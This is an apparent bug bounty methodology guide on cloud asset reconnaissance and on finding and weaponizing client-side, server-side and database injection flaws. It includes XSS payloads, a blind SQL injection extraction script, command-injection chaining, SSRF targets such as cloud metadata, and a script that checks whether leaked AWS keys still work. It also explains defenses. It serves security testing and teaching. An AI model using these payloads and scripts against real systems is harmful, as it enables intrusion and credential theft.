Comprehensive Bug Bounty Hunting Methodology
This document outlines a detailed methodology for bug bounty hunting, focusing on cloud misconfigurations, various injection vulnerabilities, and application logic flaws.
Part 1: Cloud Infrastructure Bug Bounty Methodology
Goal: Identify and report misconfigurations in the target's public cloud infrastructure that could lead to data exposure or unauthorized access. This involves scrutinizing flaws in cloud services utilized by the application, whether it's misconfigured infrastructure hosted by the cloud provider or application code insecurely leveraging cloud services.
Section 1.1: Enumerate Cloud Infrastructure and Attack Surface
The initial phase involves comprehensive reconnaissance to identify all cloud resources associated with the target.
- Automated Multi-Cloud OSINT:
  - Utilize tools like Cloud_Enum to perform a broad search across multiple cloud providers (AWS, Azure, GCP) for assets related to the target organization. This tool helps discover storage buckets, cloud functions, and other publicly exposed resources.
- DNS Record Analysis for Resource Identification:
  - Specific Tooling: Employ tools such as Fire_cloud standalone, which specializes in reviewing DNS records of subdomains to find AWS resources. This tool can often be adapted for other cloud providers by modifying its search patterns.
- Manual CNAME Record Inspection: Manually inspect CNAME records in DNS lookups. Often, cloud resources are masked behind subdomains that point to them via CNAME entries. Look for CNAMEs pointing to common cloud service domains. This list is not exhaustive but provides a starting point (a minimal resolver sketch follows the list):
  - `amazonaws.com` (and its various service-specific subdomains like `s3.amazonaws.com`, `elb.amazonaws.com`)
  - `digitaloceanspaces.com`
  - `windows.net` (Azure services like `blob.core.windows.net`)
  - `storage.googleapis.com`
  - `aliyuncs.com`
  - Other provider-specific domains (e.g., Oracle Cloud, IBM Cloud).
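To automate the manual CNAME review above, a short resolver script can flag subdomains whose CNAME target ends in a known cloud suffix. This is a minimal sketch, assuming the `dnspython` package is installed and that a hypothetical `subdomains.txt` file contains one hostname per line:

```python
# Minimal sketch: flag subdomains whose CNAME points at a known cloud provider suffix.
# Assumes `pip install dnspython` and a hypothetical subdomains.txt wordlist (one host per line).
import dns.exception
import dns.resolver

CLOUD_SUFFIXES = (
    "amazonaws.com.", "digitaloceanspaces.com.", "windows.net.",
    "storage.googleapis.com.", "aliyuncs.com.",
)

def cname_targets(hostname: str):
    """Return CNAME targets for a hostname, or an empty list on any lookup failure."""
    try:
        answers = dns.resolver.resolve(hostname, "CNAME")
        return [str(rdata.target) for rdata in answers]
    except dns.exception.DNSException:
        return []

if __name__ == "__main__":
    with open("subdomains.txt") as handle:
        for sub in (line.strip() for line in handle if line.strip()):
            for target in cname_targets(sub):
                if target.endswith(CLOUD_SUFFIXES):
                    print(f"[cloud] {sub} -> {target}")
```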
- Domain Discovery via Azure AD:
  - Use AADInternals OSINT to potentially uncover new domains or subdomains related to the target, which might then lead to more cloud resources.
  - In a PowerShell prompt:

    ```powershell
    import-module AADInternals
    Invoke-AADIntReconAsOutsider -Domain "{target-website.com}" | format-table
    ```
- Web Page Scraping for Cloud Resources:
  - Employ tools like CloudScraper to scrape web pages for links and references to cloud storage assets (e.g., S3 buckets, Azure blobs).
- OSINT Search for Exposed Secrets:
  - GitHub Reconnaissance (Manual & Automated):
    - User/Organization Specific Searches: Use scripts like github-users.py to search for secrets within a target user's or organization's repositories.
      - `python3 github-users.py -k {target_keyword_or_company_name}`
    - Advanced Dorking: Utilize tools like Github-Brute-Dork for systematic dorking to find leaked API keys, credentials, or sensitive configuration files.
      - `python3 github_brutedork.py -u [YOUR_GITHUB_USER] -t [YOUR_GITHUB_TOKEN] -U [TARGET_USER] -o [TARGET_ORG] -v -d`
* **Impact Assessment of Found Secrets:**
* Use **[Dora](https://github.com/sdushantha/dora#example-use-cases)** to quickly assess the potential impact and permissions associated with discovered cloud service keys or tokens.
* **Validity Check for Secrets:**
    * Verify the functionality and permissions of any discovered secrets (a minimal AWS key check appears at the end of this section) using tools/scripts like:
* **[Keyhacks (Python)](https://github.com/streaak/keyhacks)**
* **[keyhacks.sh (Bash)](https://github.com/gwen001/keyhacks.sh)**
- Automated Vulnerability Scanning for Cloud Assets:
- Leverage Nuclei Cloud Enum Templates. These templates can help automate the discovery of common misconfigurations and exposures in cloud services (e.g., publicly accessible S3 buckets, open Elasticsearch instances).
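As a concrete instance of the validity check described above, a leaked AWS key pair can be tested with a single STS call before digging into its permissions. This is a minimal sketch, assuming `boto3` is installed; the key and secret placeholders stand in for material found during OSINT:

```python
# Minimal sketch: confirm whether a leaked AWS access key is still live.
# Assumes `pip install boto3`; the key/secret values are placeholders from OSINT findings.
import boto3
from botocore.exceptions import ClientError

def check_aws_key(access_key: str, secret_key: str) -> None:
    sts = boto3.client(
        "sts",
        aws_access_key_id=access_key,
        aws_secret_access_key=secret_key,
        region_name="us-east-1",
    )
    try:
        identity = sts.get_caller_identity()  # succeeds with any valid credentials
        print(f"VALID key for account {identity['Account']}: {identity['Arn']}")
    except ClientError as err:
        print(f"Key rejected: {err.response['Error']['Code']}")

if __name__ == "__main__":
    check_aws_key("AKIA_EXAMPLE_KEY_ID", "EXAMPLE_SECRET_ACCESS_KEY")
```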
Section 1.2: Analyzing for Infrastructure Misconfigurations
Once cloud assets are identified, the next step is to probe for common misconfigurations.
- Research Common Misconfigurations:
- For each discovered service (e.g., S3, EC2, Azure Blob Storage, Kubernetes), research the most prevalent misconfigurations. Focus on services left publicly accessible unintentionally or those with overly permissive access granted to internet-facing users.
- Consult comprehensive resources like:
- HackTricks Cloud: An extensive knowledge base for cloud penetration testing techniques and misconfigurations.
- Hacking The Cloud: A curated collection of attack techniques against cloud services.
Section 1.3: Analyzing Application Code Interaction with Cloud Services
Applications often interact with cloud services. Flaws in this interaction can lead to vulnerabilities.
- Review HTTP Traffic:
  - While interacting with the target application, meticulously monitor HTTP(S) traffic using a proxy like Burp Suite or OWASP ZAP.
  - Look for requests made directly to cloud resources (e.g., `*.s3.amazonaws.com`, `*.blob.core.windows.net`).
  - Analyze how the application uses these resources: Is it fetching static assets, uploading user data, or making API calls to cloud-backed services?
- Research Insecure Implementations:
  - Once you understand how the application uses a cloud service, research common ways these integrations can be implemented insecurely. For instance, if an application generates signed URLs for S3, check if the permissions are too broad or if the signing process can be manipulated.
- Utilize hands-on learning platforms:
- PwnedLabs: Offers practical labs to understand and exploit cloud application misconfigurations.
- Refer to industry best practices and common pitfalls:
- OWASP Cloud-Native Application Security Top 10: Highlights the most critical security risks in cloud-native applications.
Part 2: Injection Vulnerabilities Methodology
Goal: Discover instances where unexpected user-controlled input causes the application to behave in an unintended manner, potentially leading to data breaches, command execution, or denial of service.
Injection attacks occur when user-controlled input within an HTTP Request is processed by the application in a way that alters its intended execution flow. This could manifest as an error (e.g., HTTP 500), triggering a new conditional logic path, or any other deviation from normal behavior.
Section 2.1: Step 1 - Fuzzing for Unexpected Behavior
The primary step is to identify input patterns (payloads) that trigger anomalous responses.
- Establish a Baseline:
  - Send legitimate HTTP requests to various endpoints and record the expected responses (status codes, content, headers). This baseline is crucial for identifying deviations.
- Systematic Fuzzing:
  - Iterate through various attack vectors within the HTTP request (URL parameters, POST body parameters, headers, cookies).
  - Inject simple payloads, often single characters or basic HTML elements, one by one.
  - Monitor responses for any variations from the established baseline (a minimal fuzzing sketch follows the examples below).
- Examples of Baseline vs. Variation:
* **Scenario 1: Server-Side Error Triggered**
    * **Baseline:** `GET /fetch?dest=safeapp.com` results in a `200 OK` response with the message "Done!"
    * **Variation:** `GET /fetch?dest=safeapp.com@` results in a `500 Internal Server Error` response with "ERROR: Site cannot be reached!"
    * **Unexpected Behavior:** The response code changes, indicating a server-side error.
* **Scenario 2: Data Handling Error**
* **Baseline:** `GET /search?q=rs0n` results in a `200 OK` response with an empty JSON object.
* **Variation:** `GET /search?q=rs0n"` results in a `500 Internal Server Error`.
* **Unexpected Behavior:** The response code changes, and no data is returned, suggesting an error in data processing or querying.
* **Scenario 3: Client-Side Rendering Change**
* **Baseline:** `GET /welcome?user=rs0n` results in `<h1>Welcome rs0n</h1>`.
* **Variation:** `GET /welcome?user=<b>rs0n</b>` results in `<h1>Welcome <b>rs0n</b></h1>`.
* **Unexpected Behavior:** The DOM renders formatted text (bold) that the developer did not intend, indicating potential HTML injection.
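The sketch below illustrates the baseline-versus-variation idea in code: record the normal response for a parameter, then replay the request with single-character probes and report any deviation in status code or body length. It assumes the `requests` package; the target URL and parameter name are hypothetical placeholders.

```python
# Minimal sketch: compare fuzzed responses against a recorded baseline.
# Assumes `pip install requests`; URL and parameter name are hypothetical placeholders.
import requests

TARGET = "https://target.example/search"   # hypothetical endpoint
PARAM = "q"
PROBES = ["'", '"', ";", "|", "&", "<", ">", "@", "`", "{{7*7}}"]

def snapshot(value: str):
    """Return (status_code, body_length) for a given parameter value."""
    resp = requests.get(TARGET, params={PARAM: value}, timeout=10)
    return resp.status_code, len(resp.text)

if __name__ == "__main__":
    base_status, base_len = snapshot("rs0n")          # known-good baseline
    for probe in PROBES:
        status, length = snapshot("rs0n" + probe)
        # Any change in status code or a large change in body size is worth investigating.
        if status != base_status or abs(length - base_len) > 50:
            print(f"Deviation with {probe!r}: {base_status}->{status}, body {base_len}->{length}")
```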
Section 2.2: Step 2 - Finding WHERE the Break is Occurring
Determine which part of the application (Client-Side, Server-Side, Database) is processing the input and causing the unexpected behavior. This is akin to how Dynamic Application Security Testing (DAST) scanners operate.
- Client-Side Injection:
  - Occurs when user input is reflected in the DOM, and the payload causes new HTML elements to render or JavaScript to execute.
  - Example: The `/welcome?user=<b>rs0n</b>` scenario where bold text appears. The injected HTML is directly visible in the browser's rendered output, and may also appear in the raw HTTP response body if server-side templating is involved.
- Server-Side Code Injection:
  - Typically indicated by errors (like HTTP 500) occurring before a complete DOM is returned, or by behavior changes driven by server-side logic.
  - Example: The `/fetch?dest=safeapp.com@` scenario. The error is server-generated. Researching the `@` symbol in URL contexts might point towards server-side URL parsing or request libraries. If `@` doesn't have special meaning in common database syntaxes, server-side code is a stronger candidate.
- Database Injection:
  - Often indicated by errors when special characters used in database query languages (like `'`, `"`, `;`) are injected. Endpoint names like `/search` or parameter names like `q` or `id` can be hints.
  - Example: The `/search?q=rs0n"` scenario. The `"` character is highly significant in SQL and other query languages. This makes a database interaction the likely culprit.
Section 2.3: Step 3 - Finding WHY the Break is Occurring
Understand the specific reason the payload causes the unexpected behavior. This involves investigating the underlying technology and code patterns.
- Server-Side Injection Analysis (`/fetch?dest=safeapp.com@`):
  - Observation: The `@` symbol causes a server error. The endpoint name (`fetch`) and error message ("Site cannot be reached!") suggest an outgoing HTTP request.
  - Research:
    - The `@` symbol is generally not allowed directly in domain names for registration, but it has a special meaning in URLs: `protocol://user:password@host/`.
    - If the server-side code constructs a URL from `safeapp.com@`, it might interpret `safeapp.com` as a username for an empty host, or the library (e.g., node-fetch) might throw an error due to the malformed URL (e.g., `https://safeapp.com@`).
  - Hypothesis: The server-side code attempts to make an HTTP request using the `dest` parameter. The `@` symbol corrupts the URL formation, leading to an exception in the HTTP client library. (A minimal URL-parsing sketch follows this list.)
- Database Injection Analysis (`/search?q=rs0n"`):
  - Observation: A `"` causes a 500 error on a search endpoint.
  - Research: Double quotes (`"`) are commonly used to delimit strings or identifiers in SQL queries. NoSQL databases often use `$` operators for queries, with `"` for simple strings.
  - Hypothesis: The application is likely using an SQL database. The input `rs0n"` is appended into a query like `SELECT * FROM main_table WHERE data CONTAINS "rs0n"";`, creating a syntax error due to the extra quote.
- Client-Side Injection Analysis (`/welcome?user=<b>rs0n</b>`):
  - Observation: HTML tags in the `user` parameter are rendered in the browser.
  - Analysis: Determine if the DOM is built server-side (payload in HTTP response) or client-side (JavaScript manipulation).
  - Finding: The server response does not contain `<b>rs0n</b>`. Instead, an inline JavaScript block is found:

    ```html
    <script type="text/javascript">
      function getQueryParameter(name) {
        const urlParams = new URLSearchParams(window.location.search);
        return urlParams.get(name);
      }

      function displayWelcomeMessage() {
        const userName = getQueryParameter('user');
        if (userName) {
          document.body.innerHTML = `<h1>Welcome ${userName}</h1>`;
        } else {
          document.body.innerHTML = `<h1>Welcome Guest</h1>`;
        }
      }

      window.onload = displayWelcomeMessage;
    </script>
    ```
  - Hypothesis: Client-side JavaScript retrieves the `user` parameter and uses `innerHTML` to update the DOM, leading to HTML injection.
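Returning to the server-side analysis above, the snippet below shows how a standards-compliant URL parser treats everything before `@` as userinfo, which is the behavior hypothesized for the `/fetch` endpoint. It uses only the Python standard library; the target's actual HTTP client (e.g., node-fetch) may behave differently.

```python
# Minimal sketch: how a standards-compliant parser treats '@' in a URL.
# The target may use a different client (e.g., node-fetch), so exact behavior can vary.
from urllib.parse import urlsplit

for dest in ("safeapp.com", "safeapp.com@", "safeapp.com@evil.example"):
    parts = urlsplit(f"https://{dest}/")
    # With an '@' present, 'safeapp.com' becomes the userinfo portion and the real host changes.
    print(f"dest={dest!r:28} username={parts.username!r:16} host={parts.hostname!r}")
```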
Section 2.4: Step 4 - Weaponizing The Break
Transform the identified break into a demonstrable vulnerability with security impact.
- Server-Side Injection Weaponization (`/fetch?dest=safeapp.com@` -> SSRF):
  - Hypothesis Confirmation: The application makes an HTTP request. Confirm this by providing a URL to a server you control (e.g., Burp Collaborator): `/fetch?dest=[YOUR_COLLABORATOR_DOMAIN]`.
  - Vulnerability Mapping: If an HTTP request is received by your Collaborator, this confirms an External Service Interaction. If you can make the server request internal resources (e.g., `http://localhost:8080/admin`, `http://169.254.169.254/latest/meta-data/`) or interact with internal services in a meaningful way, it becomes Server-Side Request Forgery (SSRF).
  - Impact: Demonstrate SSRF by accessing an internal service not otherwise reachable, or by exfiltrating data from such a service. Even causing a distinguishable effect on an internal application can show impact.
- Database Injection Weaponization (`/search?q=rs0n"` -> Blind SQLi):
  - Assumption: SQL database, no direct error messages (blind).
  - Goal: Exfiltrate data or bypass authentication (here, exfiltration, as it's a search).
  - Payload Refinement:
    - Known break: `/search?q=rs0n"` (500 error).
    - Attempt to complete the query and comment out the rest: `/search?q=rs0n";--+`
    - If this returns a 200 response (like the baseline), it suggests MySQL (`;` as statement terminator, `--+` as comment). The query becomes `SELECT * FROM main_table WHERE data CONTAINS "rs0n";--+";`.
  - Establishing True/False States (for Blind SQLi):
    - Find a query that returns results (True condition): `/search?q=a";--+` (returns results).
    - The 500 error with `/search?q=rs0n"` can be a False condition.
  - Exploitation: Use boolean-based or time-based blind SQL injection techniques with nested queries to exfiltrate data byte-by-byte. Example: `/search?q=a" AND (SELECT SUBSTRING(version(),1,1))='5';--+` (a minimal boolean-based probe sketch follows this list).
- Client-Side Injection Weaponization (`/welcome?user=<b>rs0n</b>` -> XSS):
  - Context: Inline JavaScript using ``document.body.innerHTML = `Welcome ${userName}`;``.
  - Goal: Execute arbitrary JavaScript in the victim's browser (XSS).
  - Initial Attempt (Script Tags):
    - Payload: `/welcome?user=rs0n</h1><script>alert(document.domain)</script><h1>`
    - Result: Elements render, but no alert.
  - Research `innerHTML` and Script Tags: The `innerHTML` property has specific behaviors with `<script>` tags; they typically don't execute when inserted this way. However, event handlers in other tags (like `<img>`, `<svg>`) often do.
  - Successful Payload (img onerror):
    - Payload: `/welcome?user=<h1>harrison</h1><img src='X' onerror=alert(document.domain) />`
    - URL Encoded: `/welcome?user=%3Ch1%3Eharrison%3C%2Fh1%3E%3Cimg%20src%3D%27X%27%20onerror%3Dalert(document.domain)%20%2F%3E`
    - Result: JavaScript execution achieved.
  - Impact & Delivery: Craft a payload to steal cookies, perform actions on behalf of the user, or redirect to a malicious site. Deliver via a crafted link.
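Returning to the blind SQLi weaponization above, a boolean-based extraction loop can be sketched as follows. It assumes the `requests` package, the hypothetical `/search` endpoint from the example, and that a "results found" response is distinguishable from the empty/error case; all of those details are placeholders to adapt per target.

```python
# Minimal sketch: boolean-based blind SQLi, recovering the DB version one character at a time.
# Assumes `pip install requests`; endpoint, payload shape, and the "True" marker are hypothetical.
import requests
import string

TARGET = "https://target.example/search"                 # hypothetical endpoint from the example
CHARSET = string.digits + string.ascii_letters + ".-"    # enough for a typical version string

def condition_is_true(condition: str) -> bool:
    """Send a query that only returns results when `condition` is true."""
    payload = f'a" AND ({condition});--+'
    resp = requests.get(TARGET, params={"q": payload}, timeout=10)
    # "True" here means the response resembles the known-good baseline (tune per target).
    return resp.status_code == 200 and len(resp.text) > 100

def extract_version(max_len: int = 10) -> str:
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in CHARSET:
            if condition_is_true(f"SELECT SUBSTRING(version(),{pos},1)='{ch}'"):
                recovered += ch
                break
        else:
            break  # no character matched; assume the end of the string
    return recovered

if __name__ == "__main__":
    print("version():", extract_version())
```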
Section 2.5: Detailed Client-Side Injections
Goal: Attacker's user-controlled input forces the Document Object Model (DOM) to load or behave in a way that the developers did not intend, often leading to JavaScript execution in the victim's browser.
Reference: YouTube Video - Bug Bounty Hunting for Client-Side Injection Vulnerabilities | Part I (placeholder link)
- Basic Hunting Methodology for HTML/JavaScript Injection:
* **Injecting HTML Elements Directly (Reflected in Server Response):**
1. **Find Reflected Input:** Identify where user input (e.g., GET parameter `rs0n`) is reflected in the server's HTML response (e.g., `<h1>Welcome rs0n!</h1>`).
2. **Escalate to HTML Injection:** Test if HTML tags are rendered (e.g., `<b>rs0n</b>` in GET parameter reflected as `<h1>Welcome <b>rs0n!</b></h1>`, making "rs0n" bold).
3. **Escalate to JavaScript Execution:** Attempt to inject script tags or event handlers (e.g., `</h1><script>alert(document.domain)</script>` or `<img src=x onerror=alert(document.domain)>`).
* **Injecting HTML Elements via Client-Side JavaScript:**
1. **Identify Unsanitized JS Processing:** Find instances where user-controlled input (e.g., `location.hash`, `location.search`, `postMessage` data) is taken from the DOM or URL and processed by client-side JavaScript without proper sanitization (e.g., `location.hash` passed to `document.write` or `element.innerHTML`).
2. **Escalate to HTML Injection:** Craft input that results in HTML rendering (e.g., `https://vulnerable.app#<h1>rs0nwuzhere</h1>` leading to `<h1>rs0nwuzhere</h1>` in the DOM).
3. **Escalate to JavaScript Execution:** Inject payloads that trigger JavaScript (e.g., `https://vulnerable.app#<img%20src=1%20onerror=alert(document.domain)>`).
- CSS Injection:
  - Occurs when user input is reflected into a CSS context (e.g., a `<style>` tag or inline `style` attribute).
  - Can lead to data exfiltration (e.g., using attribute selectors and `background-image: url()`), UI redressing, or sometimes trigger script execution in older browsers or specific contexts.
- Client-Side Prototype Pollution (CSPP):
  - Reference: Placeholder YouTube link.
  - Find a Deep Merge: Identify JavaScript code (custom or from an NPM package like `lodash` before patched versions) that recursively merges objects.
  - User-Controlled Input in Merge: Ensure user input can control key/value pairs in one of the objects being merged (e.g., query parameters parsed into an object: `{"rs0n":"rs0n","key1":"value1"}`).
  - Poison Prototype: Craft input to modify `Object.prototype` by injecting `__proto__` as a key (e.g., `{"__proto__":{"rs0n":"rs0n"},"key1":"value1"}`).
  - Identify a Gadget Chain: Find client-side JavaScript code that uses an object property that isn't explicitly defined on the object itself, causing JavaScript to look up the property on the prototype chain (e.g., `config = {"url":"safe.com","default":true}; document.write("<a href=" + config.url + ">Click Here!</a>")`). If `config.url` is not set, but `Object.prototype.url` is, the latter will be used.
  - Exploit Gadget Chain: Poison the prototype with a property that the gadget chain uses, leading to XSS or other undesired behavior (e.g., `{"__proto__":{"url":"javascript:alert(document.domain)"},"key1":"value1"}`).
Common Attack Techniques stemming from Client-Side Injections:
* **Content Injection:** Manipulating website content by injecting malicious data. Can be used for phishing or disseminating harmful links.
* **Reflected Cross-Site Scripting (XSS):** Malicious script injected via user input, reflected in the server's response, and executed in the victim's browser.
* **Stored Cross-Site Scripting (XSS):** Malicious script injected and stored permanently (e.g., in a database, comment section). Executed when any user views the infected page.
* **Blind Cross-Site Scripting (XSS):** Injected script whose execution is not immediately visible to the attacker. Often triggers in a different part of the application or for a privileged user (e.g., an admin panel viewing logs).
* **Dangling Markup Injection:** Injecting incomplete HTML tags. Attackers can use this to capture data submitted in forms that appear after the injected markup or to break page rendering. For example, an unclosed `<a>` tag with a malicious `href` could make a large portion of the page a clickable link to an attacker's site. It can also be used to exfiltrate anti-CSRF tokens or other sensitive data by making them part of a URL that gets sent to an external server.
* **Client-Side JavaScript Injection (Non-DOM XSS):** User input is passed to JavaScript "sinks" like `eval()`, `setTimeout()`, `new Function()` without writing directly to the DOM in a way that causes HTML parsing.
* **DOM-Based Cross-Site Scripting (XSS):** Vulnerability exists in the client-side code. User input influences how the DOM is modified, leading to script execution. The server is often unaware.
* **DOM-Based Open Redirect:** Client-side script modifies the DOM to redirect users to an external, attacker-controlled URL (e.g., by manipulating `window.location` with user input).
* **Client-Side Template Injection (CSTI):** User input is injected into client-side templates (e.g., AngularJS, Vue.js, React with `dangerouslySetInnerHTML` if not careful) leading to XSS or unintended template code execution.
* **postMessage Vulnerabilities:** Insecure handling of `window.postMessage()` calls. If the origin of the message isn't checked, or if data is handled unsafely, it can lead to XSS or data leakage between windows/frames.
* **Client-Side Denial of Service (DoS) / Breaking The DOM:** Injecting content or triggering JavaScript that causes the browser to hang, crash, or become unusable (e.g., regex DoS, infinite loops, memory exhaustion).
- Weaponizing and Mitigating HTML-Based Client-Side Injections:
* **Compensating Controls (Defenses):**
* **Client-Side Validation (PREVENTS SOME ATTACKS/IMPROVES UX):** Can be bypassed, but useful for UX and guiding legitimate users. May reveal developer concerns.
* **Server-Side Validation (PREVENTS ATTACK):** Crucial. Ensures input is of expected type and size; sanitizes or rejects malicious characters.
* **Web Application Firewall (WAF) (CAN PREVENT ATTACK):** Blocks requests based on rulesets and malicious patterns. Can be bypassed.
    * **Output Encoding (PREVENTS ATTACK):** Contextually encodes user input before rendering it in the DOM (e.g., HTML entity encoding, JavaScript string escaping). This is a primary defense against XSS (a minimal encoding sketch appears at the end of this section).
* **Cookie Flags (MITIGATES IMPACT):**
* `HttpOnly`: Prevents JavaScript access to cookies.
* `Secure`: Ensures cookies are only sent over HTTPS.
* `SameSite` (`Strict`, `Lax`, `None`): Controls when cookies are sent with cross-site requests, mitigating CSRF and some information leakage.
* **Content Security Policy (CSP) (MITIGATES IMPACT/CAN PREVENT ATTACK):** Directives telling the browser where resources can be loaded from, what scripts can execute, etc. Can significantly reduce XSS impact or prevent it.
* **Demonstrating Impact:**
* Steal victim's cookies (if not `HttpOnly`).
* Force victim to make arbitrary HTTP requests (CSRF-like actions).
* Steal sensitive information from the DOM of restricted pages the victim can access.
* Perform UI redressing or phishing.
* Keylogging.
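To make the Output Encoding control above concrete, here is a small illustration of HTML-entity encoding using Python's standard library; the render functions are hypothetical stand-ins for whatever templating layer the target uses.

```python
# Minimal sketch: HTML-entity encoding neutralizes the <img onerror> payload from earlier.
# The render functions are hypothetical stand-ins for a real templating layer.
from html import escape

payload = "<img src='X' onerror=alert(document.domain) />"

def render_unsafe(user_input: str) -> str:
    return f"<h1>Welcome {user_input}</h1>"                       # reflected as markup -> XSS

def render_encoded(user_input: str) -> str:
    return f"<h1>Welcome {escape(user_input, quote=True)}</h1>"   # rendered as inert text

print(render_unsafe(payload))    # a browser would execute the onerror handler
print(render_encoded(payload))   # &lt;img src=&#x27;X&#x27; ... displayed, not executed
```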
Section 2.6: Detailed Server-Side Injections
Goal: Attacker's user-controlled input forces a server-side method or process to execute in a way the developers did not intend, potentially leading to Remote Code Execution (RCE), SSRF, file manipulation, etc.
- Basic Hunting Methodology for Server-Side Injections:
* **Core Principle:** Break the Application -> Understand Why It Broke -> Weaponize the Break.
* **Identify Fuzzing Targets:**
* URL Parameters (GET/POST)
* HTTP Headers (custom headers, User-Agent, Referer, etc.)
* Cookie values
* JSON/XML/other body content
* File uploads (filenames, metadata, content)
* Any user-controlled input processed by the application. Prioritize inputs reflected in the DOM or those that seem to influence backend logic.
* **Fuzzing Techniques:**
* **Unexpected Types:** If a string is expected, send `null`, an integer, an array, or a boolean.
* **Large Payloads:** Send an excessive amount of data (e.g., 10,000 'A's) to test for buffer overflows or handling limits.
    * **Special Characters:** Inject various special characters (e.g., `'`, `"`, `;`, `|`, `&`, `$`, `<`, `>`, backticks, etc.) individually or in combinations. Test different encodings (URL, Hex, Double Hex).
* **Burp Suite's "Backslash Powered Scanner":** Useful for finding subtle server-side injection points by observing how backslashes are processed.
- Vulnerability Examples by Language/Technology (and common sinks):
* **[Command Injection](https://book.hacktricks.xyz/pentesting-web/command-injection):** Input is passed to a system shell.
* **Node.js:** `child_process.exec()`, `child_process.execSync()`, `child_process.spawn()`
* **PHP:** `exec()`, `system()`, `passthru()`, `shell_exec()`, backticks (`` ` ``)
* **Python:** `os.system()`, `subprocess.run(..., shell=True)`, `subprocess.call(..., shell=True)`, `pty.spawn()`
* **Java:** `Runtime.getRuntime().exec(String)` (especially if concatenating input into the command string)
* **Payloads:** `victim_cmd ; malicious_cmd`, `victim_cmd && malicious_cmd`, `victim_cmd | malicious_cmd`, `` `malicious_cmd` ``
* **[Code Injection](https://owasp.org/www-community/attacks/Code_Injection) (Eval Injection):** Input is parsed and executed as code by the programming language interpreter. *"Eval is Evil."*
* **Node.js (JavaScript):** `eval()`, `new Function()`, `setTimeout(string, ...)` , `setInterval(string, ...)`
* **PHP:** `eval()`, `assert()` (with string input), `preg_replace()` with `/e` modifier (deprecated but found in old code), `create_function()`
* **Python:** `eval()`, `exec()`
* **Java:** `javax.script.ScriptEngineManager().getEngineByName("js").eval()` (if evaluating user input)
* **[Server-Side Request Forgery (SSRF)](https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery):** Application makes an HTTP request to a URL (or part of a URL) controlled by the attacker.
* **Node.js:** `http.request()`, `https.request()`, `axios.get()`, `request.get()`, `fetch()` (via `node-fetch` or native)
* **PHP:** `curl_exec()` (via `curl_init()`), `file_get_contents()`, `fsockopen()`
* **Python:** `requests.get()`, `urllib.request.urlopen()`
* **Java:** `java.net.URL.openConnection()`, `java.net.HttpURLConnection`, Apache HttpClient, OkHttp
* **[Server-Side Template Injection (SSTI)](https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection):** Input is embedded into a server-side template, allowing template syntax execution (a minimal Jinja2 sketch appears at the end of this section).
* **Node.js (e.g., Jade/Pug, EJS, Handlebars):**
* Jade/Pug: `var html = jade.render('USER_CONTROLLED_INPUT', options);` ([HackTricks Jade](https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection#jade-nodejs))
* **PHP (e.g., Twig, Smarty):**
* Twig: `$output = $twig->render('template_name', ['user_input' => USER_CONTROLLED_INPUT]);` or `$output = $twig->createTemplate(USER_CONTROLLED_INPUT)->render();` ([HackTricks Twig](https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection#twig-php))
* **Python (e.g., Jinja2, Mako, Tornado):**
* Jinja2: `template.render(user_input=USER_CONTROLLED_INPUT)` or `Template(USER_CONTROLLED_INPUT).render()` ([HackTricks Jinja2](https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection#jinja2-python))
* **Java (e.g., Velocity, Freemarker, Thymeleaf, Spring View Templates):**
* [Spring Examples](https://www.baeldung.com/spring-template-engines), [HackTricks Java SSTI](https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection#java)
* **[Server-Side Prototype Pollution (SSPP)](https://portswigger.net/web-security/prototype-pollution/server-side):** Similar to CSPP but affects server-side JavaScript (Node.js) objects. Can lead to RCE, ACL bypass, or other issues if polluted properties are used in security-sensitive operations.
    * **Node.js:** Vulnerable object merging functions, often custom-written or from older versions of libraries like `lodash` or `jquery.extend`. Example of a vulnerable recursive merge:
    ```javascript
    // Recursively merges 'source' into 'target' without filtering dangerous keys,
    // so attacker-controlled JSON like {"__proto__": {"isAdmin": true}} pollutes Object.prototype.
    const merge = (target, source) => {
        for (const key of Object.keys(source)) {
            // Recurse when both sides hold nested objects
            if (source[key] instanceof Object && target[key] instanceof Object) {
                Object.assign(source[key], merge(target[key], source[key]));
            }
        }
        Object.assign(target || {}, source);
        return target;
    }
    // If the user controls 'source' and can set source.__proto__.isAdmin = true,
    // every object in the application now inherits isAdmin = true.
    ```
* **[Insecure Deserialization](https://book.hacktricks.xyz/pentesting-web/deserialization):** User-controlled data is deserialized without proper validation, leading to object injection and potential RCE.
* **PHP:** `unserialize()` (look for magic methods like `__wakeup`, `__destruct`, `__toString`)
* **Python:** `pickle.loads()`, `yaml.unsafe_load()`
* **Node.js:** Libraries like `node-serialize`'s `unserialize()`, `js-yaml`'s `load()` without safe options.
* **Java:** `java.io.ObjectInputStream.readObject()`, XML deserializers (XStream, Jackson with polymorphic typing enabled), JSON deserializers.
* **[File Inclusion (LFI/RFI)](https://book.hacktricks.xyz/pentesting-web/file-inclusion):** Application includes a file specified by user input.
* **PHP:** `include()`, `require()`, `include_once()`, `require_once()`, `fopen($filename, 'r')`, `file_get_contents($filename)`
* **Python:** `open("filename.txt", "r")` (if filename is user-controlled)
* **Node.js:** `fs.readFileSync('filename.txt', 'utf8')` (if filename is user-controlled)
* **Java:** `new File("filename.txt")` (if filename is user-controlled and then read/processed)
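Relating to the SSTI sinks listed above, the following sketch contrasts the safe pattern (user input passed as a template variable) with the vulnerable pattern (user input concatenated into the template source), using Jinja2 since the document already names it as a Python sink; the payload is the classic `{{7*7}}` probe.

```python
# Minimal sketch: safe vs. vulnerable Jinja2 usage for the SSTI probe {{7*7}}.
# Assumes `pip install jinja2`; "user_input" stands in for attacker-controlled data.
from jinja2 import Template

user_input = "{{7*7}}"

# Safe: input is passed as data, so the braces are never evaluated as template syntax.
safe = Template("Hello {{ name }}!").render(name=user_input)
print(safe)        # -> Hello {{7*7}}!

# Vulnerable: input becomes part of the template source and is evaluated.
vulnerable = Template("Hello " + user_input + "!").render()
print(vulnerable)  # -> Hello 49!
```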
Section 2.7: Detailed Database Injections
Goal: Attacker's user-controlled input forces the application to make a database query that the developers did not intend, leading to data exfiltration, modification, deletion, or authentication bypass.
- SQL Injection (SQLi):
  - Targets relational databases (MySQL, PostgreSQL, MSSQL, Oracle, SQLite, etc.).
  - Detection: Injecting SQL metacharacters (`'`, `"`, `)`, `;`, `--`, `#`) and observing errors or changes in behavior.
